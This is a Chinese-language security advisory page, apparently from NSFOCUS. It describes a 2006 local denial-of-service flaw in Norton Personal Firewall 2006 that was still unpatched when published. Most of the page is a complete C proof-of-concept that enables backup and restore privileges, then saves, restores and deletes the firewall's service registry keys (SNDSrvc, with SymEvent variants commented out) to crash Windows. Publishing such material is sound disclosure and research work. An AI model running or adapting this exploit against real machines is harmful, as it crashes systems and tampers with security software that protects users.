安全研究

安全漏洞
Symantec Norton个人防火墙注册表访问拒绝服务漏洞

发布日期:2006-07-15
更新日期:2006-07-17

受影响系统:
Symantec Norton Personal Firewall 2006 9.1.0.33
描述:
BUGTRAQ  ID: 18995

Symantec Norton个人防火墙是非常流行的防火墙软件。

Norton个人防火墙实现上存在漏洞,本地攻击者可能利用此漏洞对防火墙执行拒绝服务攻击。

Norton防火墙没有正确地检查对标准Windows API函数RegSaveKey、RegRestoreKey和RegDeleteKey的调用。在注册表项 HKLM\SYSTEM\CurrentControlSet\Services\SNDSrvc 或 HKLM\SYSTEM\CurrentControlSet\Services\SymEvent 对上述函数的组合调用会触发Norton驱动实现中的错误,导致系统崩溃。

<*来源:David Matousek (david@matousec.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=115298587710164&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/*

Testing program for Insufficient protection of Norton service registry keys (BTP00004P002NF)

Usage:
prog
   (the program is executed without special arguments)

Description:
This program calls standard registry functions on the registry key "HKLM\SYSTEM\CurrentControlSet\Services\SNDSrvc".
This results in system crash. System crashes also if registry key "HKLM\SYSTEM\CurrentControlSet\Services\SymEvent"
is used.

Test:
Running the testing program.

*/

#include <stdio.h>
#include <windows.h>


void about(void)
{
  printf("Testing program for Insufficient protection of Norton service registry keys (BTP00004P002NF)\n");
  printf("Windows Personal Firewall analysis project\n");
  printf("Copyright 2006 by Matousec - Transparent security\n");
  printf("http://www.matousec.com/\n\n");
  return;
}

void usage(void)
{
  printf("Usage: test\n"
         "  (the program is executed without special arguments)\n");
  return;
}

void print_last_error()
{
  LPTSTR buf;
  DWORD code=GetLastError();
  if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)&buf,0,NULL))
  {
    fprintf(stderr,"Error code: %d\n",code);
    fprintf(stderr,"Error message: %s",buf);
    LocalFree(buf);
  } else fprintf(stderr,"Unable to format error message for code %d.\n",code);
  return;
}




/*
enable_privilege adds privilege to own token
returns TRUE if succeed
*/

int enable_privilege(char *priv_name)
{
  DWORD res=0;
  HANDLE tok;
  LUID luid;
  TOKEN_PRIVILEGES privs;

  if (!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&tok)) return 0;
  if (LookupPrivilegeValue(NULL,priv_name,&luid))
  {
    privs.PrivilegeCount=1;
    privs.Privileges[0].Luid=luid;
    privs.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
    DWORD ret_len;
    res=AdjustTokenPrivileges(tok,0,&privs,sizeof(TOKEN_PRIVILEGES),NULL,&ret_len);
    CloseHandle(tok);
  }
  return res;
}


/*
enable_backup_privilege adds backup privilege to own token
returns TRUE if succeed
*/

int enable_backup_privilege(void)
{
  return enable_privilege(SE_BACKUP_NAME);
}


/*
enable_restore_privilege adds restore privilege to own token
returns TRUE if succeed
*/

int enable_restore_privilege(void)
{
  return enable_privilege(SE_RESTORE_NAME);
}

                                    
int main(int argc,char **argv)
{
  about();

  enable_restore_privilege();
  enable_backup_privilege();

  HKEY key;
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SNDSrvc\\Security",0,KEY_READ,&key);
  RegSaveKey(key,"bug.regsav",NULL);
  RegCloseKey(key);
  RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SNDSrvc\\Security",0,
                 NULL,REG_OPTION_BACKUP_RESTORE,0,NULL,&key,NULL);
  RegRestoreKey(key,"bug.regsav",0);
  RegCloseKey(key);
  DeleteFile("bug.regsav");
  RegDeleteKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SNDSrvc\\Security");

  RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SNDSrvc\\Enum",0,KEY_READ,&key);
  RegSaveKey(key,"bug.regsav",NULL);
  RegCloseKey(key);
  RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SNDSrvc\\Enum",0,
                 NULL,REG_OPTION_BACKUP_RESTORE,0,NULL,&key,NULL);
  RegRestoreKey(key,"bug.regsav",0);
  RegCloseKey(key);
  DeleteFile("bug.regsav");
  RegDeleteKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SNDSrvc\\Enum");

/*
  HKEY key;
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SymEvent\\Security",0,KEY_READ,&key);
  RegSaveKey(key,"bug.regsav",NULL);
  RegCloseKey(key);
  RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SymEvent\\Security",0,
                 NULL,REG_OPTION_BACKUP_RESTORE,0,NULL,&key,NULL);
  RegRestoreKey(key,"bug.regsav",0);
  RegCloseKey(key);
  DeleteFile("bug.regsav");
  RegDeleteKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SymEvent\\Security");

  RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SymEvent\\Enum",0,KEY_READ,&key);
  RegSaveKey(key,"bug.regsav",NULL);
  RegCloseKey(key);
  RegCreateKeyEx(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SymEvent\\Enum",0,
                 NULL,REG_OPTION_BACKUP_RESTORE,0,NULL,&key,NULL);
  RegRestoreKey(key,"bug.regsav",0);
  RegCloseKey(key);
  DeleteFile("bug.regsav");
  RegDeleteKey(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\SymEvent\\Enum");
*/
  printf("\nTEST FAILED!\n");
  return 1;
}

建议:
厂商补丁:

Symantec
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.symantec.com/sabu/nis/npf/

浏览次数:3787
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客